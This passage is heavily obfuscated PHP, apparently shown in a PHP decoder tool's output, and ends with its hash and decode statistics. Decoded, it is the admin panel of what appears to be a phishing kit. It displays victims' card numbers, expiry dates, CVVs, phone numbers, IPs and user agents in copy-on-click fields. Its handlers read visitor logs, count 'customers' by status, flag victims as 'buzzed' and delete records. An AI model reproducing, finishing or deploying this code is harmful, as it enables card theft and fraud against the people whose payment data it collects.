c\x27\76\x50\150\x6f\156\145\40\x4e\157\56\74\57\x6c\x61\142\x65\154\76\xa\x9\x9\11\11\x9\11\x9\11\x3c\151\156\x70\x75\164\x20\x6f\x6e\143\x6c\x69\143\x6b\x3d\x27\143\x6f\160\171\x5f\x62\x74\156\50\164\150\x69\163\51\x27\x20\143\x6c\141\163\x73\x3d\x27\x66\157\x72\x6d\55\x63\157\x6e\x74\162\157\x6c\x27\x20\x72\145\x61\x64\157\156\154\171\x20\x76\141\x6c\x75\145\x3d\47{$phonenum}\47\76\xa\11\11\x9\11\x9\x9\11\x3c\57\x64\151\x76\x3e\xa\11\11\x9\11\11\11\11\74\144\151\166\40\x63\154\x61\x73\163\75\47\x64\x61\164\141\x2d\x67\162\157\x75\160\47\76\xa\11\x9\x9\11\11\x9\x9\11\74\154\x61\x62\145\x6c\40\143\x6c\141\x73\163\75\x27\x64\x61\x74\141\x2d\x6c\x61\142\x65\x6c\47\x3e\x43\103\40\x4e\157\x2e\x3c\x2f\154\141\x62\145\x6c\76\xa\x9\x9\x9\11\11\11\11\x9\x3c\151\156\x70\x75\x74\x20\x6f\x6e\x63\154\x69\143\x6b\x3d\x27\143\x6f\x70\x79\x5f\142\164\x6e\x28\164\x68\151\x73\51\47\40\x63\154\x61\163\x73\75\x27\146\157\x72\x6d\x2d\143\157\156\164\x72\157\154\47\40\x72\145\x61\x64\157\156\154\171\x20\166\x61\x6c\165\x65\x3d\x27{$ccnum}\47\x3e\12\x9\11\x9\11\11\11\x9\x3c\x2f\x64\151\166\x3e\12\11\x9\x9\11\x9\11\11\x3c\144\x69\x76\x20\143\x6c\141\163\x73\75\47\144\141\x74\141\x2d\147\x72\157\x75\160\47\76\xa\x9\x9\11\x9\11\x9\x9\11\74\154\141\142\x65\x6c\40\143\x6c\141\x73\x73\x3d\x27\x64\141\164\x61\55\154\x61\x62\x65\x6c\x27\x3e\105\x78\x70\151\x72\171\57\103\126\x56\74\57\154\141\x62\145\x6c\76\xa\x9\x9\x9\11\x9\x9\x9\x9\x3c\151\156\160\165\x74\40\157\156\x63\154\x69\x63\x6b\x3d\47\x63\157\x70\x79\137\142\164\x6e\50\x74\150\151\x73\x29\x27\40\x63\x6c\x61\163\x73\x3d\x27\146\157\162\x6d\x2d\143\157\156\x74\x72\157\x6c\x27\x20\162\x65\141\144\x6f\x6e\x6c\x79\x20\166\x61\154\165\x65\x3d\47{$expiry}\57{$cvvnum}\x27\76\12\11\11\11\11\11\x9\x9\74\x2f\x64\151\x76\x3e\12\11\11\x9\11\x9\x9\x9\74\x64\x69\166\x20\143\154\x61\x73\x73\x3d\47\144\141\164\x61\55\147\162\x6f\165\x70\47\76\12\x9\x9\11\x9\x9\11\11\11\74\154\141\142\145\154\x20\143\154\x61\163\163\x3d\x27\144\x61\x74\x61\x2d\x6c\141\142\x65\x6c\x27\x3e\111\x50\x2f\104\x65\166\x69\143\145\74\x2f\154\141\142\x65\154\76\12\x9\x9\11\11\11\x9\x9\x9\74\x69\x6e\160\x75\164\40\x6f\156\143\x6c\x69\x63\153\75\47\x63\157\x70\x79\x5f\x62\164\x6e\x28\x74\150\x69\x73\x29\x27\40\143\154\141\163\163\x3d\x27\x66\157\162\155\55\x63\157\x6e\164\162\x6f\154\47\x20\162\145\x61\x64\x6f\156\x6c\171\40\166\x61\x6c\165\x65\75\47{$ip}\x20\133{$useragent}\x5d\47\76\xa\x9\x9\11\x9\11\11\x9\x3c\57\x64\x69\x76\76\12\x9\11\x9\11\x9\x9\x9\x3c\142\162\76\12\11\x9\x9\11\x9\x9\x3c\57\144\x69\166\x3e\xa\11\11\x9\11\11\xa\x9\x9\11\11\11\x3c\x21\55\55\x20\x45\x4e\104\x20\55\x2d\76\xa\11\x9\x9\x9\x9\xa\x9\x9\11\x9\11\x3c\x64\151\166\x20\143\154\141\163\163\x3d\x27\x6d\x6f\x64\x61\x6c\55\x66\x6f\157\x74\x65\162\47\40\x73\x74\171\x6c\x65\x3d\47\x6d\141\x72\147\x69\x6e\x2d\164\x6f\160\72\x2d\64\x30\160\170\47\x3e\xa\11\x9\11\x9\11\74\142\x75\164\x74\x6f\156\40\x73\x74\171\x6c\x65\75\47\x63\157\x6c\x6f\x72\72\x62\x6c\141\x63\x6b\x3b\x62\141\143\153\x67\162\157\x75\156\x64\x2d\143\x6f\154\157\x72\x3a\x77\x68\x69\164\x65\47\40\164\x79\x70\145\75\x27\142\165\164\x74\x6f\x6e\x27\x20\x6f\x6e\x63\154\x69\143\x6b\x3d\x27\143\154\x6f\x73\145\x5f\142\164\x6e\x28\x29\47\40\143\x6c\x61\163\163\x3d\47\142\164\x6e\x20\142\x74\x6e\x2d\x6c\147\x20\x62\x74\x6e\x2d\144\x61\162\x6b\x20\x63\x6f\154\55\61\62\47\40\x3e\x43\x4c\x4f\x53\x45\x3c\57\x62\x75\164\x74\157\156\76\12\x9\11\11\11\x9\12\11\x9\11\11\11\x3c\57\144\x69\x76\x3e\xa\x9\x9\11\12\x9\11\11\74\x2f\x64\151\x76\x3e\xa\x9\x9\11\xa\x9\11\x9\x3c\57\x64\x69\166\76\12\x9\x9\x9\x3c\x2f\144\151\166\x3e\12\x9\x9\x9\74\x2f\144\x69\x76\x3e\12\11\x9\x9\74\x2f\x66\157\x72\155\76\12\x9\x9\x9\74\x2f\144\x69\166\76\12\x9\11\11"; } } if (isset($_GET["\143\157\165\x6e\164\145\x72"])) { $ipFile = "\x2e\x2e\57\x2e\x2e\57\x6c\x6f\x67\163\57\166\x69\x73\151\164\163\x2e\164\x78\164"; $activequery = mysqli_query($conn, "\x53\105\x4c\x45\x43\x54\x20\x2a\40\x46\x52\117\x4d\x20\143\165\x73\164\157\155\x65\x72\163\40\127\x48\105\122\105\x20\163\164\141\164\165\x73\40\x3c\62\x30"); $completequery = mysqli_query($conn, "\123\105\114\105\x43\124\x20\52\x20\x46\x52\x4f\x4d\x20\x63\165\x73\x74\x6f\155\145\162\163\x20\x57\110\105\x52\105\40\163\x74\x61\x74\x75\163\75\x32\60"); if ($activequery and $completequery) { $userRows = count(file($ipFile)); $activeRows = mysqli_num_rows($activequery); $completeRows = mysqli_num_rows($completequery); $stats = array("\165\163\145\162\x6e\165\155" => $userRows, "\x61\143\x74\x69\166\145\x6e\x75\155" => $activeRows, "\143\157\155\x70\154\145\164\145\144\x6e\x75\x6d" => $completeRows); echo json_encode($stats); } else { echo json_encode(array("\163\x74\x61\x74\163" => "\145\162\162\x6f\162")); } } if (isset($_GET["\166\x69\x73\x69\x74\154\157\x67"])) { $ipFile = "\x2e\x2e\x2f\56\x2e\57\x6c\157\147\x73\57\166\x69\163\151\x74\x6f\162\163\x2e\164\170\164"; $logquery = file_get_contents($ipFile, true); if ($logquery) { $log = array("\x76\x69\163\x69\x74\157\x72\154\x6f\x67" => $logquery); echo json_encode($log); } else { echo json_encode(array("\x73\164\141\x74\163" => "\x65\162\162\157\x72")); } } if (isset($_GET["\142\165\172\172\x6f\x66\x66"])) { $query = mysqli_query($conn, "\123\x45\114\105\x43\124\40\x2a\40\106\x52\117\115\x20\143\165\x73\164\157\155\145\x72\163\40\x57\x48\x45\x52\x45\x20\x73\164\x61\164\x75\163\x3c\x3d\x37"); if ($query) { $array = array_filter(mysqli_fetch_all($query, MYSQLI_ASSOC)); foreach ($array as $value) { $userid = $value["\x69\x64"]; $queryy = mysqli_query($conn, "\125\120\x44\101\x54\105\40\143\x75\x73\x74\157\x6d\x65\162\163\x20\123\105\x54\40\x62\x75\x7a\172\145\144\75\x31\x20\x57\110\x45\x52\x45\40\151\144\75{$userid}"); if ($queryy) { $stat = "\x6f\x6b"; } else { $stat = "\x6e\157\x74\157\x6b"; } } if ($stat == "\x6f\153") { echo json_encode(array("\x73\x74\x61\x74\x75\x73" => "\x6f\153")); } else { echo json_encode(array("\x73\164\x61\x74\165\163" => "\x6e\x6f\x74\x6f\x6b")); } } else { echo json_encode(array("\163\x74\x61\164\x75\163" => "\156\x6f\x74\157\153")); } } if ($_GET["\x74\171\160\145"] == "\144\x65\x6c\145\x74\x65") { if ($_POST["\x75\163\145\162\151\144"] and numeric($_POST["\165\163\x65\x72\x69\x64"]) == true) { $userid = $_POST["\x75\163\x65\x72\151\x64"]; $query = mysqli_query($conn, "\104\105\114\x45\x54\x45\x20\106\x52\117\115\x20\143\x75\x73\164\x6f\155\145\162\163\x20\127\x48\105\x52\x45\40\x69\144\75{$userid}"); if ($query) { echo json_encode(array("\163\164\141\x74\165\x73" => "\x6f\153")); } else { echo json_encode(array("\163\x74\141\x74\165\x73" => "\x6e\157\164\x6f\153")); } } else { echo json_encode(array("\163\164\x61\164\165\163" => "\156\157\164\x6f\x6b\153")); } } } goto Xv57R; AtyZK: include "\x6d\141\162\x67\151\x6e\x2e\x70\150\x70"; goto RVXPC; mMHrq: ?>

Function Calls

None

Variables

None

Stats

MD5 b34f91763a1a8373d2b8b6c9d39bd9f6
Eval Count 0
Decode Time 150 ms